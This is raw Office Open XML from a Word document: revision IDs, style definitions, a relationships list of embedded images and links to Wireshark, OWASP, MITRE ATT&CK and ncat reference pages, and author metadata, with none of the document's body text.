    <w:rsid w:val="056DE5B8"/>
    <w:rsid w:val="056DE5B8"/>
    <w:rsid w:val="069020DB"/>
    <w:rsid w:val="0774BDE1"/>
    <w:rsid w:val="0C023FFE"/>
    <w:rsid w:val="0C3D6E84"/>
    <w:rsid w:val="0CEAD90D"/>
    <w:rsid w:val="0F053E31"/>
    <w:rsid w:val="0F357DBA"/>
    <w:rsid w:val="0FE98946"/>
    <w:rsid w:val="10341FCB"/>
    <w:rsid w:val="10EB12EF"/>
    <w:rsid w:val="144E74C7"/>
    <w:rsid w:val="152BEF5B"/>
    <w:rsid w:val="16D59205"/>
    <w:rsid w:val="1719C375"/>
    <w:rsid w:val="17D06346"/>
    <w:rsid w:val="187DFC78"/>
    <w:rsid w:val="18A4DABB"/>
    <w:rsid w:val="18A62312"/>
    <w:rsid w:val="18F20B0B"/>
    <w:rsid w:val="1A6C38CF"/>
    <w:rsid w:val="1C1090E2"/>
    <w:rsid w:val="1C1090E2"/>
    <w:rsid w:val="1CDBCEA8"/>
    <w:rsid w:val="1E59553F"/>
    <w:rsid w:val="1E937561"/>
    <w:rsid w:val="1EAB6B35"/>
    <w:rsid w:val="1FF20C1A"/>
    <w:rsid w:val="203239DA"/>
    <w:rsid w:val="21E32C6F"/>
    <w:rsid w:val="24AFB13C"/>
    <w:rsid w:val="2966E642"/>
    <w:rsid w:val="2B4935EA"/>
    <w:rsid w:val="2B4935EA"/>
    <w:rsid w:val="2B7D124C"/>
    <w:rsid w:val="2CDA4F27"/>
    <w:rsid w:val="2CDA4F27"/>
    <w:rsid w:val="2E2B4D02"/>
    <w:rsid w:val="2EFE98E0"/>
    <w:rsid w:val="31676822"/>
    <w:rsid w:val="32AD4E64"/>
    <w:rsid w:val="34E72B93"/>
    <w:rsid w:val="38FDE49D"/>
    <w:rsid w:val="38FDE49D"/>
    <w:rsid w:val="3951BCDC"/>
    <w:rsid w:val="3951BCDC"/>
    <w:rsid w:val="3AC03C9F"/>
    <w:rsid w:val="3AC03C9F"/>
    <w:rsid w:val="3B82F8ED"/>
    <w:rsid w:val="3E45B068"/>
    <w:rsid w:val="3EF2951B"/>
    <w:rsid w:val="4057A3AF"/>
    <w:rsid w:val="410DE248"/>
    <w:rsid w:val="4134E2CE"/>
    <w:rsid w:val="4266A8B1"/>
    <w:rsid w:val="43AA775C"/>
    <w:rsid w:val="4C4AA50E"/>
    <w:rsid w:val="4E0E2B4F"/>
    <w:rsid w:val="4FD1485E"/>
    <w:rsid w:val="51494FAD"/>
    <w:rsid w:val="518A16AA"/>
    <w:rsid w:val="52BCE230"/>
    <w:rsid w:val="54808E6E"/>
    <w:rsid w:val="571657EA"/>
    <w:rsid w:val="5725EADF"/>
    <w:rsid w:val="5C292A98"/>
    <w:rsid w:val="5CEC314D"/>
    <w:rsid w:val="5E18341D"/>
    <w:rsid w:val="6005AA08"/>
    <w:rsid w:val="6005AA08"/>
    <w:rsid w:val="60CC561E"/>
    <w:rsid w:val="64718F60"/>
    <w:rsid w:val="6773304E"/>
    <w:rsid w:val="6773304E"/>
    <w:rsid w:val="6B619DA4"/>
    <w:rsid w:val="6BEDA977"/>
    <w:rsid w:val="6E5F3136"/>
    <w:rsid w:val="6E726B36"/>
    <w:rsid w:val="6F35DBE3"/>
    <w:rsid w:val="6F58CAFD"/>
    <w:rsid w:val="6FF2B5F6"/>
    <w:rsid w:val="726FA487"/>
    <w:rsid w:val="74C1E712"/>
    <w:rsid w:val="74CB6DBA"/>
    <w:rsid w:val="74E5A581"/>
    <w:rsid w:val="76081565"/>
    <w:rsid w:val="7865B81F"/>
    <w:rsid w:val="7865B81F"/>
    <w:rsid w:val="79968D7D"/>
    <w:rsid w:val="79F89B41"/>
    <w:rsid w:val="7A3BDD48"/>
    <w:rsid w:val="7B423C25"/>
    <w:rsid w:val="7CBA0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5776E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5E411203-5EE2-4279-8CEA-193866BE79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34E72B9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4E72B9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4E72B9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4E72B93"/>
    <w:pPr>
      <w:spacing/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading1Char" w:customStyle="true">
    <w:uiPriority w:val="9"/>
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:rsid w:val="34E72B93"/>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yperlink">
    <w:uiPriority w:val="99"/>
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="34E72B9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3" mc:Ignorable="w14">
    <w:name xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="Grid Table 5 Dark Accent 3"/>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EDEDED" w:themeFill="accent3"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xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:type="band1Vert">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DBDBDB" w:themeFill="accent3" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"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91946250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.png" Id="rId461089763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.png" Id="rId1343573504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.png" Id="rId1659517239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.png" Id="rId880408196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6.png" Id="rId1123752482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image7.png" Id="rId280085477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image8.png" Id="rId178182055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image9.png" Id="rId1004639702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagea.png" Id="rId1681821620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imageb.png" Id="rId233426481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wireshark.org/docs/" TargetMode="External" Id="R42a95dcd0e094f2a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/File%5C_Upload%5C_Cheat%5C_Sheet.html" TargetMode="External" Id="Rbfeb1dc9b01e4505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/" TargetMode="External" Id="R9b51c7f8eda842e7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ipinfo.io/" TargetMode="External" Id="R31c621b8ce0f494f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/" TargetMode="External" Id="R8fefa7415c694279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/ncat/" TargetMode="External" Id="Ra688e69a3d4e4607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="R9658fd38f87e40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2026-08-01T14:30:47.3760825Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-01T20:06:28.8213840Z</dcterms:modified>
  <dc:creator>Selline Nafula Mang&amp;#039;eni</dc:creator>
  <lastModifiedBy>Selline Nafula Mang&amp;#039;eni</lastModifiedBy>
</coreProperties>
</file>